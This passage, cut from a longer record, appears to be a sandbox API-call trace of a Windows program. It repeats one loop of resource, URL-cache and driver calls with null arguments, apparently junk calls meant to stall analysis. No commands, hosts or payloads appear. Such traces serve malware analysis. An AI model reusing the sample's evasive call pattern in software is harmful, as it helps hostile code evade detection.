lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.774] GetUserDefaultLangID () returned 0x409 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.774] GetUserDefaultLangID () returned 0x409 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.774] GetUserDefaultLangID () returned 0x409 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.774] GetUserDefaultLangID () returned 0x409 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.774] GetUserDefaultLangID () returned 0x409 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.774] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.774] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.774] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.774] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.774] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.775] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.775] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.775] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.775] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.775] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.775] GetUserDefaultLangID () returned 0x409 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.775] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.775] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.775] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.775] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.776] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.776] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.776] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.776] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.776] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.776] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.776] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.776] GetUserDefaultLangID () returned 0x409 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.776] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.776] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.777] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.777] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.777] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.777] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.777] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.777] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.777] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.777] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.777] GetUserDefaultLangID () returned 0x409 [0185.777] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.778] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.778] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.778] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.778] GetUserDefaultLangID () returned 0x409 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.778] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.778] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.778] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.778] GetUserDefaultLangID () returned 0x409 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.778] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.778] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 